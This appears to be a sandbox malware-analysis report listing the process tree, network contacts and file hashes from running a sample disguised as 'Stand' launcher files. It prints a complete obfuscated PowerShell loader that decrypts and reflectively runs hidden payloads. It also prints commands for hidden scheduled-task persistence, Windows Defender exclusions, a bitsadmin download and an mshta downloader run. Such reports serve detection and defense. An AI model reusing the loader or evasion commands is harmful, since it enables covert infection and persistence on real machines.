PID 2116 wrote to memory of 1984 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\svchost.exe
PID 2116 wrote to memory of 2572 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\svchost.exe
PID 2116 wrote to memory of 1776 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\svchost.exe
PID 2116 wrote to memory of 2760 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\svchost.exe
PID 2116 wrote to memory of 2740 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\mshta.exe
PID 2116 wrote to memory of 2740 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\mshta.exe
PID 2116 wrote to memory of 2740 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\mshta.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k DcomLaunch -p

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k RPCSS -p

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s nsi

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork -p

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k netprofm -p -s netprofm

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k NetworkService -p

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNoNetworkFirewall -p

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k NetworkService -p

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k UdkSvcGroup -s UdkUserSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k osprivacy -p -s camsvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Stand.Handler.bat"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('tX3lqGmOY/6C3S9lu7bskJOFzr7BWG83o03z91HSs3M='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('tcoPI+6H25yjw8y/a/hjpA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $izumb=New-Object System.IO.MemoryStream(,$param_var); $eDQfo=New-Object System.IO.MemoryStream; $xllVv=New-Object System.IO.Compression.GZipStream($izumb, [IO.Compression.CompressionMode]::Decompress); $xllVv.CopyTo($eDQfo); $xllVv.Dispose(); $izumb.Dispose(); $eDQfo.Dispose(); $eDQfo.ToArray();}function execute_function($param_var,$param2_var){ $bsVjW=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $PVEip=$bsVjW.EntryPoint; $PVEip.Invoke($null, $param2_var);}$jENbu = 'C:\Users\Admin\AppData\Local\Temp\Stand.Handler.bat';$host.UI.RawUI.WindowTitle = $jENbu;$qAnWg=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($jENbu).Split([Environment]::NewLine);foreach ($DfcJO in $qAnWg) { if ($DfcJO.StartsWith('CrsuqcOEqAjCofwNVLly')) { $OceyL=$DfcJO.Substring(20); break; }}$payloads_var=[string[]]$OceyL.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName '$phantom-RuntimeBroker_startup_137_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\$phantom-startup_str_137.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\$phantom-startup_str_137.vbs"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\$phantom-startup_str_137.bat" "

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('tX3lqGmOY/6C3S9lu7bskJOFzr7BWG83o03z91HSs3M='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('tcoPI+6H25yjw8y/a/hjpA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $izumb=New-Object System.IO.MemoryStream(,$param_var); $eDQfo=New-Object System.IO.MemoryStream; $xllVv=New-Object System.IO.Compression.GZipStream($izumb, [IO.Compression.CompressionMode]::Decompress); $xllVv.CopyTo($eDQfo); $xllVv.Dispose(); $izumb.Dispose(); $eDQfo.Dispose(); $eDQfo.ToArray();}function execute_function($param_var,$param2_var){ $bsVjW=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $PVEip=$bsVjW.EntryPoint; $PVEip.Invoke($null, $param2_var);}$jENbu = 'C:\Users\Admin\AppData\Roaming\$phantom-startup_str_137.bat';$host.UI.RawUI.WindowTitle = $jENbu;$qAnWg=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($jENbu).Split([Environment]::NewLine);foreach ($DfcJO in $qAnWg) { if ($DfcJO.StartsWith('CrsuqcOEqAjCofwNVLly')) { $OceyL=$DfcJO.Substring(20); break; }}$payloads_var=[string[]]$OceyL.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\Downloader.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}

C:\Users\Admin\AppData\Roaming\Stand.Launchpad.exe

"C:\Users\Admin\AppData\Roaming\Stand.Launchpad.exe"

C:\Windows\SysWOW64\bitsadmin.exe

"C:\Windows\System32\bitsadmin.exe" /transfer 8 https://github.com/calamity-inc/Stand-Launchpad/releases/download/1.9/Stand.Launchpad.exe C:\Users\Admin\AppData\Local\Temp\Stand.Launchpad.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Stand.Launchpad.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Stand.Launchpad.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Stand.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Stand.exe'

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Stand" /tr "C:\Users\Admin\AppData\Local\Temp\Stand.exe"

C:\Users\Admin\AppData\Local\Temp\Stand.Launchpad.exe

"C:\Users\Admin\AppData\Local\Temp\Stand.Launchpad.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 1.112.95.208.in-addr.arpa udp
GB 20.26.156.215:443 github.com tcp
US 185.199.108.133:443 objects.githubusercontent.com tcp
DE 193.161.193.99:57023 Name1442-57023.portmap.host tcp
US 172.67.188.90:443 stand.gg tcp
US 172.67.188.90:443 stand.gg tcp

Files

memory/3736-0-0x00007FFDD02C3000-0x00007FFDD02C5000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_by2gmg5s.nqg.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3736-9-0x000002536A610000-0x000002536A632000-memory.dmp

memory/3736-10-0x00007FFDD02C0000-0x00007FFDD0D82000-memory.dmp

memory/3736-11-0x00007FFDD02C0000-0x00007FFDD0D82000-memory.dmp

memory/3736-12-0x00007FFDD02C0000-0x00007FFDD0D82000-memory.dmp

memory/3736-13-0x000002536AA70000-0x000002536AAB6000-memory.dmp

memory/3736-14-0x000002536A6B0000-0x000002536A6B8000-memory.dmp

memory/3736-15-0x000002536AAC0000-0x000002536AB1C000-memory.dmp

memory/1788-25-0x00007FFDD02C0000-0x00007FFDD0D82000-memory.dmp

memory/1788-26-0x00007FFDD02C0000-0x00007FFDD0D82000-memory.dmp

memory/1788-27-0x00007FFDD02C0000-0x00007FFDD0D82000-memory.dmp

memory/1788-30-0x00007FFDD02C0000-0x00007FFDD0D82000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 df472dcddb36aa24247f8c8d8a517bd7
SHA1 6f54967355e507294cbc86662a6fbeedac9d7030
SHA256 e4e0fbc974e6946d20ddfaf22c543fccc4662d28e30530ec710fec149958f9b6
SHA512 06383259258a8c32f676ddaf7ea1fec3de7318ff1338f022e03c6b33458f2ce708e073ceb1aa26e3cf37f82dac37c8163b8ebd2de56b8530dffe177845c7adca

C:\Users\Admin\AppData\Roaming\$phantom-startup_str_137.vbs

MD5 5d0a3f7fab3242d6131d80c40d2bc7c0
SHA1 45f5433289437947f5f46b309a2699b555e92bc4
SHA256 743862cf48839232e78bf61131d5853297e07dda1b61fbb78f648123ccc88a3e
SHA512 d89a760c772caed5482f103f8b6284473ae8d5b60f571de1d5b31983d8dafb1f7bd3c8991bf862fa58292e627cfd1df825f7577020b5c11179e5c6eef6f7d49a

C:\Users\Admin\AppData\Roaming\$phantom-startup_str_137.bat

MD5 b6de263fec4f04997a869ed7112b8759
SHA1 59d43ded2302f76f602e6ea7ae1285b373300f3b
SHA256 152c7242abce7287170a4025def239d75c3c294e0710f7073f6bbb25abc31c44
SHA512 5237ea099e1bfef0ea6daeb77a78ba45fde4facfc010fb8182568c69f9d67b6eb3bb5a74a51b54a2a89299abbc4b733f01b9ad6e2d36df857c0586a883489533

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

MD5 3ec0d76d886b2f4b9f1e3da7ce9e2cd7
SHA1 68a6a2b7b0fa045cd9cf7d63d4e30600a7b25dea
SHA256 214be9e8293b00fc05089068033edb41da350e0f127dd782bf6cb748000a56a5
SHA512 a49d758d03e3a7bc38be29d577c3e0d0c69eb08d0496a81b9406b446c5808d7dfbab39c5be3b45cbb4aec511d87c6166453cbd12cebe5d8663a60b5d773206c6

memory/3736-47-0x00007FFDD02C0000-0x00007FFDD0D82000-memory.dmp

memory/3288-48-0x0000000002270000-0x000000000229A000-memory.dmp

memory/1052-98-0x00007FFDB1090000-0x00007FFDB10A0000-memory.dmp

memory/3288-95-0x00007FFDB1090000-0x00007FFDB10A0000-memory.dmp

memory/2388-99-0x00007FFDB1090000-0x00007FFDB10A0000-memory.dmp

memory/4468-107-0x00007FFDB1090000-0x00007FFDB10A0000-memory.dmp

memory/1004-110-0x00007FFDB1090000-0x00007FFDB10A0000-memory.dmp

memory/4352-111-0x00007FFDB1090000-0x00007FFDB10A0000-memory.dmp

memory/1468-109-0x00007FFDB1090000-0x00007FFDB10A0000-memory.dmp

memory/3184-108-0x00007FFDB1090000-0x00007FFDB10A0000-memory.dmp

memory/3448-106-0x00007FFDB1090000-0x00007FFDB10A0000-memory.dmp

memory/2260-105-0x00007FFDB1090000-0x00007FFDB10A0000-memory.dmp

memory/1120-104-0x00007FFDB1090000-0x00007FFDB10A0000-memory.dmp

memory/3492-103-0x00007FFDB1090000-0x00007FFDB10A0000-memory.dmp

memory/1168-102-0x00007FFDB1090000-0x00007FFDB10A0000-memory.dmp

memory/1984-101-0x00007FFDB1090000-0x00007FFDB10A0000-memory.dmp

memory/2572-100-0x00007FFDB1090000-0x00007FFDB10A0000-memory.dmp

memory/1196-97-0x00007FFDB1090000-0x00007FFDB10A0000-memory.dmp

memory/1176-96-0x00007FFDB1090000-0x00007FFDB10A0000-memory.dmp

memory/2116-142-0x000001D474160000-0x000001D474188000-memory.dmp

C:\Users\Admin\AppData\Roaming\Stand.Launchpad.exe

MD5 86cfa35ef19ca1d1ed0dfbc031211833
SHA1 871f69775937be2dd3b066d9747b69fc07ddc58d
SHA256 f198341fbaac08171a208c4e61f6a47609cb0991d4c4e3f6741c1e281e17c5f5
SHA512 5889f8b3c033342c8b3749ef5191dc1206da03f0c5327a11dcf0e0ba186ae8a71514993f484fdfbcd6bdb515167bedd73cf3d3a6c8d86056889a823bac485261

memory/2764-156-0x0000000000430000-0x0000000000450000-memory.dmp

C:\Users\Admin\AppData\Roaming\Downloader.hta

MD5 4ec749a8c1d7d0a4be501465d297d3dc
SHA1 d7727cb4dc96d653bce6c6bbe70ff171ecc197b7
SHA256 7bd2ea1be121e862cc93c8c41429d0f9d1d3b57478e586bbeed7d3d3be3a96f6
SHA512 38d4ca973a3da55453dd37cb8965db223d42b03493b8d5390ab58cc3b53df1405119663f91bcef2ce2efc082ea17b0021c407eb65c6076d127408f2ff2c7d44e

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 bba50f9dd06b3e0c56956b6424ad81c3
SHA1 c7dfdf28f9f4407a047e40c147460f9c638a8cda
SHA256 697a4786ef432696bfa4c4ce12b1be8c69ccde75c5a0c15d33dbb13bb68c97e3
SHA512 bc5131dcc49d1b5e328f4d3884dd308d82f832bbf59a5ec42ebd4017b28f95c4e89746787914f8ce26cf4232341961c5b2457fc9f811bba48ee04be1bda1cfff

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 45f53352160cf0903c729c35c8edfdce
SHA1 b35a4d4fbaf2a3cc61e540fc03516dd70f3c34ab
SHA256 9cf18d157a858fc143a6de5c2dd3f618516a527b34478ac478d8c94ff027b0d2
SHA512 e3fa27a80a1df58acb49106c306dab22e5ed582f6b0cd7d9c3ef0a85e9f5919333257e88aa44f42a0e095fd577c9e12a02957a7845c0d109f821f32d8d3343f3

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 a116d56b723a0d248b5a38cbc3429288
SHA1 75efdbe43b0db5b4b4761166e1a6926316715f54
SHA256 f17648922a442aed77374620c12e8a0fb492290a191204ccdb1eca3dcf2d6258
SHA512 a19db0a5120a5857571ec2593d80e9d78405a9fb4bee0f358c8dca484d1f2760d79cdb9a7abfd48db1175d09be6b190e0d02837f59cc10f212215f16b14986c0

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 050567a067ffea4eb40fe2eefebdc1ee
SHA1 6e1fb2c7a7976e0724c532449e97722787a00fec
SHA256 3952d5b543e5cb0cb84014f4ad9f5f1b7166f592d28640cbc3d914d0e6f41d2e
SHA512 341ad71ef7e850b10e229666312e4bca87a0ed9fe25ba4b0ab65661d5a0efa855db0592153106da07134d8fc2c6c0e44709bf38183c9a574a1fa543189971259

memory/1596-207-0x000001E8C16A0000-0x000001E8C16B6000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

MD5 eb773a405cbefe83accccd25904c11f5
SHA1 9050118975669ddcffc04e66f97e6fce63f867f9
SHA256 e36293e5934276da4910d6248df27b636816c5e53fd3444cac68f814e7643d4f
SHA512 d55046e5266140abd089937a441a715ecdb4eab0161e0d65a783759c7dbe3555e1f9d0b19a5e6f3e28c09c48c7dac481111d7b5e05d20a59b86d815f0b795ab7

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157

MD5 27f7fa1ffeff20843b73eadaa9b8f6c7
SHA1 d317974d43624cb9ce62eb08dfc366ff687a7e5f
SHA256 77ba1f4787a46de61124818f55d305ef780ff8c34c525537f3b0fa73688cda2c
SHA512 927b039807714709749ed5ab0b2a7ba035a6038e77215f1b2f3e943d6c4d214428957e5ed1e660a5cc33b213d3eda7aa5396b9c593c5ec430d99b02cfa68f26f